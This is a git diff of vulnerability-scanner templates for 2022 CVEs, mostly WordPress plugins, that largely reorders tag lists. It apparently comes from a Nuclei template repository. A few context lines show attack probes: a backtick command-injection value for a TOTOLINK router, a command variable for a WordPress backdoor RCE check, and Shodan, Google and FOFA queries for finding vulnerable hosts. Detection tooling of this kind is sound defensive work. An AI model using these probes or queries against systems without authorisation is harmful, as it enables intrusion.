+ tags: cve,cve2022,lfi,wp-plugin,unauth,wpscan,packetstorm,wp,wordpress,commoninja
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-1398.yaml b/http/cves/2022/CVE-2022-1398.yaml
index 5bb2b23557..a0f6b76c71 100644
--- a/http/cves/2022/CVE-2022-1398.yaml
+++ b/http/cves/2022/CVE-2022-1398.yaml
@@ -28,7 +28,7 @@ info:
vendor: external_media_without_import_project
product: external_media_without_import
framework: wordpress
- tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,wpscan,external-media-without-import,authenticated,intrusive,external_media_without_import_project
+ tags: cve2022,cve,ssrf,wordpress,wp-plugin,wp,wpscan,external-media-without-import,authenticated,intrusive,external_media_without_import_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-1442.yaml b/http/cves/2022/CVE-2022-1442.yaml
index ec52c1ef39..36d2b73177 100644
--- a/http/cves/2022/CVE-2022-1442.yaml
+++ b/http/cves/2022/CVE-2022-1442.yaml
@@ -31,7 +31,7 @@ info:
product: metform_elementor_contact_form_builder
framework: wordpress
google-query: inurl:/wp-content/plugins/metform
- tags: wpscan,cve2022,wordpress,wp-plugin,disclosure,unauth,metform,cve,wp,wpmet
+ tags: cve,cve2022,wpscan,wordpress,wp-plugin,disclosure,unauth,metform,wp,wpmet
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-1574.yaml b/http/cves/2022/CVE-2022-1574.yaml
index bb8f8ab554..24e1ba9ce1 100644
--- a/http/cves/2022/CVE-2022-1574.yaml
+++ b/http/cves/2022/CVE-2022-1574.yaml
@@ -28,7 +28,7 @@ info:
vendor: html2wp_project
product: html2wp
framework: wordpress
- tags: wp-plugin,wp,fileupload,unauth,wpscan,cve2022,wordpress,intrusive,cve,html2wp,html2wp_project
+ tags: cve,cve2022,wp-plugin,wp,fileupload,unauth,wpscan,wordpress,intrusive,html2wp,html2wp_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml
index bd7429d21c..9c60cc18d3 100644
--- a/http/cves/2022/CVE-2022-1595.yaml
+++ b/http/cves/2022/CVE-2022-1595.yaml
@@ -26,7 +26,7 @@ info:
vendor: hc_custom_wp-admin_url_project
product: hc_custom_wp-admin_url
framework: wordpress
- tags: unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,hc_custom_wp-admin_url_project
+ tags: cve,cve2022,unauth,wpscan,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,hc_custom_wp-admin_url_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-1597.yaml b/http/cves/2022/CVE-2022-1597.yaml
index fb2222f75c..f95acde2a3 100644
--- a/http/cves/2022/CVE-2022-1597.yaml
+++ b/http/cves/2022/CVE-2022-1597.yaml
@@ -28,7 +28,7 @@ info:
product: wpqa_builder
framework: wordpress
google-query: inurl:/wp-content/plugins/wpqa
- tags: wpscan,xss,wordpress,wp-plugin,wp,cve,cve2022,wpqa,2code
+ tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,wpqa,2code
variables:
user: "{{to_lower(rand_base(5))}}"
pass: "{{user}}{{to_lower(rand_base(3))}}"
diff --git a/http/cves/2022/CVE-2022-1609.yaml b/http/cves/2022/CVE-2022-1609.yaml
index cff82641ab..c6e3bb9dff 100644
--- a/http/cves/2022/CVE-2022-1609.yaml
+++ b/http/cves/2022/CVE-2022-1609.yaml
@@ -20,7 +20,7 @@ info:
metadata:
verified: false
max-request: 1
- tags: rce,wp,backdoor,wpscan,cve,cve2022,wordpress
+ tags: cve,cve2022,rce,wp,backdoor,wpscan,wordpress
variables:
cmd: "echo CVE-2022-1609 | rev"
diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml
index 92c67774b0..529bf8481d 100644
--- a/http/cves/2022/CVE-2022-1713.yaml
+++ b/http/cves/2022/CVE-2022-1713.yaml
@@ -28,7 +28,7 @@ info:
vendor: diagrams
product: drawio
shodan-query: http.title:"Flowchart Maker"
- tags: drawio,ssrf,oss,huntr,cve,cve2022,diagrams
+ tags: cve,cve2022,drawio,ssrf,oss,huntr,diagrams
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml
index c05e8c9352..a718ae3382 100644
--- a/http/cves/2022/CVE-2022-1724.yaml
+++ b/http/cves/2022/CVE-2022-1724.yaml
@@ -26,7 +26,7 @@ info:
vendor: simple-membership-plugin
product: simple_membership
framework: wordpress
- tags: xss,wp,wordpress,wpscan,cve,cve2022,wp-plugin,simple-membership-plugin
+ tags: cve,cve2022,xss,wp,wordpress,wpscan,wp-plugin,simple-membership-plugin
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml
index b39deaa667..8f9edefb6a 100644
--- a/http/cves/2022/CVE-2022-1756.yaml
+++ b/http/cves/2022/CVE-2022-1756.yaml
@@ -28,7 +28,7 @@ info:
product: newsletter
framework: wordpress
publicwww-query: "/wp-content/plugins/newsletter/"
- tags: wpscan,cve,cve2022,newsletter,xss,authenticated,thenewsletterplugin,wordpress
+ tags: cve,cve2022,wpscan,newsletter,xss,authenticated,thenewsletterplugin,wordpress
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml
index cfa908d3cf..b7376b2e8e 100644
--- a/http/cves/2022/CVE-2022-1815.yaml
+++ b/http/cves/2022/CVE-2022-1815.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: diagrams
product: drawio
- tags: huntr,cve,cve2022,drawio,ssrf,oast,oss,jgraph,diagrams
+ tags: cve,cve2022,huntr,drawio,ssrf,oast,oss,jgraph,diagrams
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-1904.yaml b/http/cves/2022/CVE-2022-1904.yaml
index 1574c5b644..8c6f6751eb 100644
--- a/http/cves/2022/CVE-2022-1904.yaml
+++ b/http/cves/2022/CVE-2022-1904.yaml
@@ -27,7 +27,7 @@ info:
vendor: fatcatapps
product: easy_pricing_tables
framework: wordpress
- tags: wp,wordpress,wpscan,cve,cve2022,wp-plugin,xss,fatcatapps
+ tags: cve,cve2022,wp,wordpress,wpscan,wp-plugin,xss,fatcatapps
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-1906.yaml b/http/cves/2022/CVE-2022-1906.yaml
index eecdef876c..2b31f9ddb9 100644
--- a/http/cves/2022/CVE-2022-1906.yaml
+++ b/http/cves/2022/CVE-2022-1906.yaml
@@ -28,7 +28,7 @@ info:
product: copyright_proof
framework: wordpress
google-query: inurl:/wp-content/plugins/digiproveblog
- tags: wordpress,xss,wp-plugin,wp,wpscan,cve,cve2022,digiprove
+ tags: cve,cve2022,wordpress,xss,wp-plugin,wp,wpscan,digiprove
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-1910.yaml b/http/cves/2022/CVE-2022-1910.yaml
index 3d660f248b..ae396af9b7 100644
--- a/http/cves/2022/CVE-2022-1910.yaml
+++ b/http/cves/2022/CVE-2022-1910.yaml
@@ -28,7 +28,7 @@ info:
vendor: averta
product: shortcodes_and_extra_features_for_phlox_theme
framework: wordpress
- tags: wordpress,xss,auxin-elements,wpscan,cve,cve2017,wp-plugin,wp,averta
+ tags: cve,cve2022,wordpress,xss,auxin-elements,wpscan,wp-plugin,wp,averta
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-1916.yaml b/http/cves/2022/CVE-2022-1916.yaml
index 990651f4f4..569c2cd1a1 100644
--- a/http/cves/2022/CVE-2022-1916.yaml
+++ b/http/cves/2022/CVE-2022-1916.yaml
@@ -26,7 +26,7 @@ info:
vendor: pluginus
product: active_products_tables_for_woocommerce
framework: wordpress
- tags: wordpress,wp-plugin,xss,wpscan,cve,cve2022,wp,pluginus
+ tags: cve,cve2022,wordpress,wp-plugin,xss,wpscan,wp,pluginus
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-1933.yaml b/http/cves/2022/CVE-2022-1933.yaml
index 6af3585cd7..51d8a84c85 100644
--- a/http/cves/2022/CVE-2022-1933.yaml
+++ b/http/cves/2022/CVE-2022-1933.yaml
@@ -28,7 +28,7 @@ info:
vendor: collect_and_deliver_interface_for_woocommerce_project
product: collect_and_deliver_interface_for_woocommerce
framework: wordpress
- tags: cdi,wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss,collect_and_deliver_interface_for_woocommerce_project
+ tags: cve,cve2022,cdi,wpscan,wp-plugin,wp,wordpress,xss,collect_and_deliver_interface_for_woocommerce_project
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-1946.yaml b/http/cves/2022/CVE-2022-1946.yaml
index 1a43f360ac..4dbd70f6d4 100644
--- a/http/cves/2022/CVE-2022-1946.yaml
+++ b/http/cves/2022/CVE-2022-1946.yaml
@@ -28,7 +28,7 @@ info:
product: gallery
framework: wordpress
google-query: inurl:"/wp-content/plugins/gallery-album/"
- tags: wpscan,cve2022,wp,xss,wordpress,gallery,unauth,cve,wp-plugin,wpdevart
+ tags: cve,cve2022,wpscan,wp,xss,wordpress,gallery,unauth,wp-plugin,wpdevart
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-2034.yaml b/http/cves/2022/CVE-2022-2034.yaml
index 4be7f004e7..e03f4e94cd 100644
--- a/http/cves/2022/CVE-2022-2034.yaml
+++ b/http/cves/2022/CVE-2022-2034.yaml
@@ -27,7 +27,7 @@ info:
vendor: automattic
product: sensei_lms
framework: wordpress
- tags: wp,disclosure,wpscan,cve,cve2022,sensei-lms,fuzz,hackerone,wordpress,wp-plugin,automattic
+ tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,fuzz,hackerone,wordpress,wp-plugin,automattic
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-21587.yaml b/http/cves/2022/CVE-2022-21587.yaml
index fcc5ea8f71..f0c021c99f 100644
--- a/http/cves/2022/CVE-2022-21587.yaml
+++ b/http/cves/2022/CVE-2022-21587.yaml
@@ -25,7 +25,7 @@ info:
max-request: 3
vendor: oracle
product: e-business_suite
- tags: cve,intrusive,ebs,unauth,kev,cve2022,rce,oast,oracle,packetstorm
+ tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml
index ae320cd39a..7cf7085608 100644
--- a/http/cves/2022/CVE-2022-21661.yaml
+++ b/http/cves/2022/CVE-2022-21661.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: wordpress
product: wordpress
- tags: wp,sqli,wpquery,wpscan,packetstorm,cve,cve2022,wordpress
+ tags: cve2022,cve,wp,sqli,wpquery,wpscan,packetstorm,wordpress
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-21705.yaml b/http/cves/2022/CVE-2022-21705.yaml
index 99ac01b5df..3138c32ad5 100644
--- a/http/cves/2022/CVE-2022-21705.yaml
+++ b/http/cves/2022/CVE-2022-21705.yaml
@@ -27,7 +27,7 @@ info:
max-request: 5
vendor: octobercms
product: october
- tags: cve,cve2022,authenticated,rce,cms,octobercms,injection
+ tags: cve2022,cve,authenticated,rce,cms,octobercms,injection
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-2174.yaml b/http/cves/2022/CVE-2022-2174.yaml
index 6c941af925..d867a3293d 100644
--- a/http/cves/2022/CVE-2022-2174.yaml
+++ b/http/cves/2022/CVE-2022-2174.yaml
@@ -26,7 +26,7 @@ info:
vendor: microweber
product: microweber
shodan-query: http.favicon.hash:780351152
- tags: huntr,cve,cve2023,microweber,xss,unauth
+ tags: cve,cve2022,huntr,microweber,xss,unauth
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-2187.yaml b/http/cves/2022/CVE-2022-2187.yaml
index 961ce7b9ff..23151f84ec 100644
--- a/http/cves/2022/CVE-2022-2187.yaml
+++ b/http/cves/2022/CVE-2022-2187.yaml
@@ -27,7 +27,7 @@ info:
vendor: contact_form_7_captcha_project
product: contact_form_7_captcha
framework: wordpress
- tags: wpscan,cve,cve2022,wordpress,xss,wp-plugin,wp,contact_form_7_captcha_project
+ tags: cve,cve2022,wpscan,wordpress,xss,wp-plugin,wp,contact_form_7_captcha_project
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-2219.yaml b/http/cves/2022/CVE-2022-2219.yaml
index 0fc763a9ef..e0474c2506 100644
--- a/http/cves/2022/CVE-2022-2219.yaml
+++ b/http/cves/2022/CVE-2022-2219.yaml
@@ -26,7 +26,7 @@ info:
vendor: brizy
product: unyson
framework: wordpress
- tags: authenticated,cve,cve2022,wordpress,wp,xss,unyson,wp-plugin,wpscan,brizy
+ tags: cve,cve2022,authenticated,wordpress,wp,xss,unyson,wp-plugin,wpscan,brizy
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml
index 84b29960c5..1ea5abbe2b 100644
--- a/http/cves/2022/CVE-2022-22242.yaml
+++ b/http/cves/2022/CVE-2022-22242.yaml
@@ -29,7 +29,7 @@ info:
vendor: juniper
product: junos
shodan-query: title:"Juniper Web Device Manager"
- tags: cve,cve2022,xss,juniper,junos
+ tags: cve2022,cve,xss,juniper,junos
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-22733.yaml b/http/cves/2022/CVE-2022-22733.yaml
index 932a9b51ac..37cc943c73 100644
--- a/http/cves/2022/CVE-2022-22733.yaml
+++ b/http/cves/2022/CVE-2022-22733.yaml
@@ -29,7 +29,7 @@ info:
vendor: apache
product: shardingsphere_elasticjob-ui
shodan-query: http.favicon.hash:816588900
- tags: cve,cve2023,exposure,sharingsphere,apache
+ tags: cve2022,cve,exposure,sharingsphere,apache
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml
index 2c3e14e9d0..8574f55bc6 100644
--- a/http/cves/2022/CVE-2022-22897.yaml
+++ b/http/cves/2022/CVE-2022-22897.yaml
@@ -29,7 +29,7 @@ info:
product: ap_pagebuilder
framework: prestashop
shodan-query: http.component:"Prestashop"
- tags: packetstorm,cve,cve2022,prestashop,sqli,unauth,apollotheme
+ tags: cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml
index 4fdfcef06f..22f0cb0277 100644
--- a/http/cves/2022/CVE-2022-22954.yaml
+++ b/http/cves/2022/CVE-2022-22954.yaml
@@ -28,7 +28,7 @@ info:
vendor: vmware
product: identity_manager
shodan-query: http.favicon.hash:-1250474341
- tags: workspaceone,kev,tenable,packetstorm,cve,cve2022,vmware,ssti
+ tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-22963.yaml b/http/cves/2022/CVE-2022-22963.yaml
index 4ce35cba09..265dc5fdb2 100644
--- a/http/cves/2022/CVE-2022-22963.yaml
+++ b/http/cves/2022/CVE-2022-22963.yaml
@@ -29,7 +29,7 @@ info:
max-request: 1
vendor: vmware
product: spring_cloud_function
- tags: vulhub,cve,cve2022,springcloud,rce,kev,vmware
+ tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-22965.yaml b/http/cves/2022/CVE-2022-22965.yaml
index ad491de065..99e6a43ed8 100644
--- a/http/cves/2022/CVE-2022-22965.yaml
+++ b/http/cves/2022/CVE-2022-22965.yaml
@@ -28,7 +28,7 @@ info:
max-request: 4
vendor: vmware
product: spring_framework
- tags: cve,cve2022,rce,spring,injection,oast,intrusive,kev,vmware
+ tags: cve2022,cve,rce,spring,injection,oast,intrusive,kev,vmware
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml
index 9f5d02bc65..d5644a0ea1 100644
--- a/http/cves/2022/CVE-2022-22972.yaml
+++ b/http/cves/2022/CVE-2022-22972.yaml
@@ -28,7 +28,7 @@ info:
vendor: vmware
product: identity_manager
fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize"
- tags: cve,cve2022,vmware,auth-bypass,oast
+ tags: cve2022,cve,vmware,auth-bypass,oast
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml
index 5ce305e24f..222466a25b 100644
--- a/http/cves/2022/CVE-2022-23102.yaml
+++ b/http/cves/2022/CVE-2022-23102.yaml
@@ -28,7 +28,7 @@ info:
vendor: siemens
product: sinema_remote_connect_server
shodan-query: title:"Logon - SINEMA Remote Connect"
- tags: packetstorm,seclists,cve,cve2022,redirect,sinema,authenticated,siemens
+ tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml
index e1160aaf44..9a8c0707df 100644
--- a/http/cves/2022/CVE-2022-23544.yaml
+++ b/http/cves/2022/CVE-2022-23544.yaml
@@ -30,7 +30,7 @@ info:
product: metersphere
shodan-query: html:"metersphere"
fofa-query: title="MeterSphere"
- tags: cve,cve2022,metersphere,ssrf,oast
+ tags: cve2022,cve,metersphere,ssrf,oast,xss
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-2373.yaml b/http/cves/2022/CVE-2022-2373.yaml
index f03cadc7ce..261e2216e2 100644
--- a/http/cves/2022/CVE-2022-2373.yaml
+++ b/http/cves/2022/CVE-2022-2373.yaml
@@ -28,7 +28,7 @@ info:
vendor: nsqua
product: simply_schedule_appointments
framework: wordpress
- tags: simply-schedule-appointments,unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp,nsqua
+ tags: cve,cve2022,simply-schedule-appointments,unauth,wpscan,wordpress,wp-plugin,wp,nsqua
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-2379.yaml b/http/cves/2022/CVE-2022-2379.yaml
index 7c053c18be..8b0fcc1d6a 100644
--- a/http/cves/2022/CVE-2022-2379.yaml
+++ b/http/cves/2022/CVE-2022-2379.yaml
@@ -28,7 +28,7 @@ info:
vendor: easy_student_results_project
product: easy_student_results
framework: wordpress
- tags: wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,cve,cve2022,easy_student_results_project
+ tags: cve,cve2022,wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,easy_student_results_project
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml
index eb4bd558d6..153fcc482d 100644
--- a/http/cves/2022/CVE-2022-2383.yaml
+++ b/http/cves/2022/CVE-2022-2383.yaml
@@ -28,7 +28,7 @@ info:
vendor: slickremix
product: feed_them_social
framework: wordpress
- tags: wp,wordpress,wp-plugin,wpscan,cve,cve2022,xss,slickremix
+ tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml
index 0083bd491e..423730b536 100644
--- a/http/cves/2022/CVE-2022-23854.yaml
+++ b/http/cves/2022/CVE-2022-23854.yaml
@@ -30,7 +30,7 @@ info:
vendor: aveva
product: intouch_access_anywhere
shodan-query: http.html:"InTouch Access Anywhere"
- tags: lfi,packetstorm,cve,cve2022,aveva,intouch
+ tags: cve,cve2022,lfi,packetstorm,aveva,intouch
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml
index fc459fd340..744e6a22d3 100644
--- a/http/cves/2022/CVE-2022-24124.yaml
+++ b/http/cves/2022/CVE-2022-24124.yaml
@@ -28,7 +28,7 @@ info:
vendor: casbin
product: "casdoor"
shodan-query: http.title:"Casdoor"
- tags: sqli,unauth,packetstorm,edb,cve,cve2022,casdoor,casbin
+ tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-24223.yaml b/http/cves/2022/CVE-2022-24223.yaml
index f99ac388f7..a179c1d576 100644
--- a/http/cves/2022/CVE-2022-24223.yaml
+++ b/http/cves/2022/CVE-2022-24223.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: thedigitalcraft
product: atomcms
- tags: packetstorm,cve,cve2022,sqli,atom,cms,thedigitalcraft
+ tags: cve,cve2022,packetstorm,sqli,atom,cms,thedigitalcraft
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml
index 41237dea11..5cec91c845 100644
--- a/http/cves/2022/CVE-2022-24265.yaml
+++ b/http/cves/2022/CVE-2022-24265.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: cuppacms
product: cuppacms
- tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms
+ tags: cve2022,cve,sqli,cuppa,authenticated,cuppacms
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml
index 34465788c2..e0b197e811 100644
--- a/http/cves/2022/CVE-2022-2462.yaml
+++ b/http/cves/2022/CVE-2022-2462.yaml
@@ -29,7 +29,7 @@ info:
vendor: transposh
product: transposh_wordpress_translation
framework: wordpress
- tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh
+ tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh,xss
http:
- method: POST
diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml
index b9ff0488a2..50349ab9eb 100644
--- a/http/cves/2022/CVE-2022-24716.yaml
+++ b/http/cves/2022/CVE-2022-24716.yaml
@@ -28,7 +28,7 @@ info:
vendor: icinga
product: icinga_web_2
shodan-query: title:"Icinga"
- tags: packetstorm,cve,cve2023,icinga,lfi
+ tags: cve,cve2022,packetstorm,icinga,lfi
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml
index c8568f3c72..c0bd822d03 100644
--- a/http/cves/2022/CVE-2022-24856.yaml
+++ b/http/cves/2022/CVE-2022-24856.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: flyte
product: flyte_console
- tags: cve,cve2022,flyteconsole,ssrf,oss,hackerone,flyte
+ tags: cve2022,cve,flyteconsole,ssrf,oss,hackerone,flyte
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml
index 019a58f516..c4d203bc05 100644
--- a/http/cves/2022/CVE-2022-2486.yaml
+++ b/http/cves/2022/CVE-2022-2486.yaml
@@ -29,7 +29,7 @@ info:
vendor: wavlink
product: wl-wn535k2_firmware
shodan-query: http.title:"Wi-Fi APP Login"
- tags: cve,cve2022,iot,wavlink,router,rce,oast
+ tags: cve2022,cve,iot,wavlink,router,rce,oast
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml
index e7d0fbe398..7572594dc8 100644
--- a/http/cves/2022/CVE-2022-24900.yaml
+++ b/http/cves/2022/CVE-2022-24900.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: piano_led_visualizer_project
product: piano_led_visualizer
- tags: cve,cve2022,lfi,piano,iot,oss,piano_led_visualizer_project
+ tags: cve2022,cve,lfi,piano,iot,oss,piano_led_visualizer_project
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml
index 1613fc6c65..d98fa0972f 100644
--- a/http/cves/2022/CVE-2022-24990.yaml
+++ b/http/cves/2022/CVE-2022-24990.yaml
@@ -27,7 +27,7 @@ info:
vendor: terra-master
product: terramaster_operating_system
shodan-query: "TerraMaster"
- tags: packetstorm,cve,cve2022,terramaster,exposure,kev,terra-master
+ tags: cve,cve2022,packetstorm,terramaster,exposure,kev,terra-master
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml
index 8cfdee501a..264acdd1d6 100644
--- a/http/cves/2022/CVE-2022-25082.yaml
+++ b/http/cves/2022/CVE-2022-25082.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: totolink
product: a950rg_firmware
- tags: totolink,cve,cve2022,router,unauth,rce,iot,intrusive
+ tags: cve,cve2022,totolink,router,unauth,rce,iot,intrusive
variables:
cmd: "`ls>../{{randstr}}`"
diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml
index 184507d76d..c6b617f2dc 100644
--- a/http/cves/2022/CVE-2022-25148.yaml
+++ b/http/cves/2022/CVE-2022-25148.yaml
@@ -28,7 +28,7 @@ info:
product: wp_statistics
framework: wordpress
google-query: inurl:/wp-content/plugins/wp-statistics
- tags: packetstorm,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs
+ tags: cve,cve2022,packetstorm,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml
index 66d110d2b1..5fde0f4f52 100644
--- a/http/cves/2022/CVE-2022-25149.yaml
+++ b/http/cves/2022/CVE-2022-25149.yaml
@@ -27,7 +27,7 @@ info:
product: wp_statistics
framework: wordpress
publicwww-query: "/wp-content/plugins/wp-statistics/"
- tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs
+ tags: cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml
index d43fce3395..6adea7b341 100644
--- a/http/cves/2022/CVE-2022-25323.yaml
+++ b/http/cves/2022/CVE-2022-25323.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: zerof
product: web_server
- tags: xss,cve,cve2022,zerof
+ tags: cve,cve2022,xss,zerof
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml
index 12f8bac022..98406cc00f 100644
--- a/http/cves/2022/CVE-2022-2535.yaml
+++ b/http/cves/2022/CVE-2022-2535.yaml
@@ -25,7 +25,7 @@ info:
product: searchwp_live_ajax_search
framework: wordpress
publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/"
- tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp
+ tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-25369.yaml b/http/cves/2022/CVE-2022-25369.yaml
index 6b39102945..c8150e8209 100644
--- a/http/cves/2022/CVE-2022-25369.yaml
+++ b/http/cves/2022/CVE-2022-25369.yaml
@@ -17,7 +17,7 @@ info:
metadata:
max-request: 1
shodan-query: http.component:"Dynamicweb"
- tags: cve,cve2022,dynamicweb,rce,unauth
+ tags: cve2022,cve,dynamicweb,rce,unauth
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-2544.yaml b/http/cves/2022/CVE-2022-2544.yaml
index cfed6a38a2..46960385fd 100644
--- a/http/cves/2022/CVE-2022-2544.yaml
+++ b/http/cves/2022/CVE-2022-2544.yaml
@@ -28,7 +28,7 @@ info:
vendor: wpmanageninja
product: ninja_job_board
framework: wordpress
- tags: ninja,exposure,wpscan,cve,cve2022,wordpress,wp-plugin,wp,wpmanageninja
+ tags: cve2022,cve,ninja,exposure,wpscan,wordpress,wp-plugin,wp,wpmanageninja
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml
index 5640b17e11..b784c49dc9 100644
--- a/http/cves/2022/CVE-2022-2546.yaml
+++ b/http/cves/2022/CVE-2022-2546.yaml
@@ -29,7 +29,7 @@ info:
vendor: servmask
product: all-in-one_wp_migration
framework: wordpress
- tags: cve,all-in-one-wp-migration,authenticated,wpscan,cve2022,wordpress,wp-plugin,wp,xss,servmask
+ tags: cve,cve2022,all-in-one-wp-migration,authenticated,wpscan,wordpress,wp-plugin,wp,xss,servmask
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml
index ee9ae17a03..a70778fc23 100644
--- a/http/cves/2022/CVE-2022-25487.yaml
+++ b/http/cves/2022/CVE-2022-25487.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: thedigitalcraft
product: atomcms
- tags: cve,cve2022,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft
+ tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft
http:
- raw:
diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml
index 777c89b5da..cd6a362de0 100644
--- a/http/cves/2022/CVE-2022-2551.yaml
+++ b/http/cves/2022/CVE-2022-2551.yaml
@@ -29,7 +29,7 @@ info:
product: duplicator
framework: wordpress
google-query: inurl:/backups-dup-lite/dup-installer/
- tags: cve2022,wordpress,wp,wp-plugin,duplicator,wpscan,cve,snapcreek
+ tags: cve2022,cve,wordpress,wp,wp-plugin,duplicator,wpscan,snapcreek
http:
- method: GET
diff --git a/http/cves/2022/CVE-2022-25568.yaml b/http/cves/2022/CVE-2022-25568.yaml
index 95a414bb9a..78dd13e15d 100644
